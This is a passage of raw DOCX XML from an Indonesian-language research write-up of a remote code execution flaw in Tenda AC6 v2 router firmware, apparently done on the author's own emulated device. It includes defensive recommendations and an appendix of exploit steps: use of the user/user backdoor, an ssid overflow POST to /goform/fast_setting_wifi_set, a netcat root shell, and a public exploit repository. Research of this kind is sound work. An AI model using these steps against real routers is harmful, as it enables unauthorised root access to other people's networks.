          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>01ad72ced717c4531dd2beb53d149597  evidence/rce_final/cave_final.s</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>fe045d327c57553f230155a81163d9d0  evidence/rce_final/cfm_mib_dgram</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>5524ef051cc5f3f600cc387debc60816  evidence/rce_final/httpd_rce</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>352316ed4e2e60b0b8cbce63f972505f  evidence/rce_final/libCfm_original.so</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>87f00756ee09b48292703a8d42b94779  evidence/rce_final/rc.g</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>11. Pelajaran &amp; Rekomendasi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>11.1 Untuk pengguna router ini</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Firmware Tenda AC6 v2 (V15.03.06.51) punya backdoor user/user dan beberapa buffer overflow. Konfigurasi ulang TIDAK menghilangkan backdoor — satu-satunya perbaikan nyata adalah update firmware atau ganti perangkat.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Matikan WPS, matikan UPnP/cloud bila tak perlu, dan jangan pernah buka panel admin ke internet.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Batasi akses admin hanya dari LAN, dan pisahkan router di segmen jaringan sendiri.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>11.2 Untuk pembelajaran</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Selalu konfirmasi versi dari data RUNTIME, bukan hanya file statis.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Gunakan emulator terisolasi untuk uji berbahaya; simpan perangkat asli sebagai cadangan + recovery.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Input pengguna wajib dibatasi panjangnya (gunakan strncpy/snprintf, not strcpy).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Lampiran A — Ringkasan Perintah Kunci</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Recon         : nmap -sT -p- 192.168.0.1 ; curl -i .../login/Auth</w:t>
        <w:br/>
        <w:t>Ambil firmware: curl -o dump.bin .../cgi-bin/DownloadFlash ; binwalk -e dump.bin</w:t>
        <w:br/>
        <w:t>Bedah         : unsquashfs ; readelf -h -l bin/httpd ; objdump -d bin/httpd</w:t>
        <w:br/>
        <w:t>Statis        : Binary Ninja (import bin/httpd -&gt; Analyze)</w:t>
        <w:br/>
        <w:t>Emulasi       : FirmAE/QEMU user-net + hostfwd 8080-&gt;80, 2323-&gt;2323</w:t>
        <w:br/>
        <w:t>Debug         : qemu -gdb + gdb-multiarch (breakpoint, baca fp+892)</w:t>
        <w:br/>
        <w:t>Eksploit      : auth user/user -&gt; POST /goform/fast_setting_wifi_set ssid=748A+addr</w:t>
        <w:br/>
        <w:t>Shell         : nc &lt;host&gt; 2323  -&gt;  / #  (root)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Lampiran B — Berkas Bukti</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>evidence/ — hasil nmap, HTML, JS bocor, cookie</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>evidence/rce_final/ — httpd_rce, cave_final.s, cave_code.bin, payload_ssid.bin, libCfm_original.so, cfm_mib_dgram, rc.g, MD5SUMS.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>evidence/exploit_pwntools.py — PoC otomatis (host: 172.17.0.2)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>evidence/report_figs/ — screenshot Binary Ninja (decompiler) &amp; terminal MATE asli</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="555555"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Seluruh data pribadi telah disamarkan. Laporan ini murni untuk pembelajaran pada perangkat milik sendiri.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>12. Reproduksi (repo) &amp; Verifikasi Clean-Room</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Seluruh langkah di laporan ini dapat direproduksi dari repo: https://github.com/farrelfaiziaulhaq/tenda-ac6-rce</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>12.1 Langkah singkat</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>git clone https://github.com/farrelfaiziaulhaq/tenda-ac6-rce.git</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>cd tenda-ac6-rce &amp;&amp; ./bootstrap.sh  (butuh sudo + internet + docker)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>docker exec firmae-run bash /repo/emulator/setup_emulator.sh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>./emulator/reboot_guest.sh  -&gt; tunggu httpd=302</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>python3 exploit/exploit.py  -&gt; ROOT SHELL di 172.17.0.2:2323</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>12.2 Hasil verifikasi (clone baru)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>httpd melayani (302); eksploit mengembalikan root shell; uname -&gt; Linux 4.1.17+ mips; cat /etc/passwd -&gt; root::0:0:root:/root:/bin/sh; echo RCE-PWNED-AC6V2 tercetak.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>12.3 Celah asli vs harness emulasi (jujur)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Celah asli: overflow strcpy pada form_fast_setting_wifi_set; backdoor user:user dari default config.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Harness emulasi (khusus repo): patch hook epilog/'cave' pada bin/httpd; libapmib.so dipatch (apmib_init/apmib_init_HW -&gt; return 1) agar httpd melewati baca config dari flash; /cfg/mib.cfg (disanitasi) disediakan sebagai config emulator.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Di perangkat asli, RCE penuh memerlukan kontrol $a0 (ROP/ret2stack) — non-PIE, NX off, tanpa canary.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7A0D0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7A0D0D"/>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7A0D0D"/>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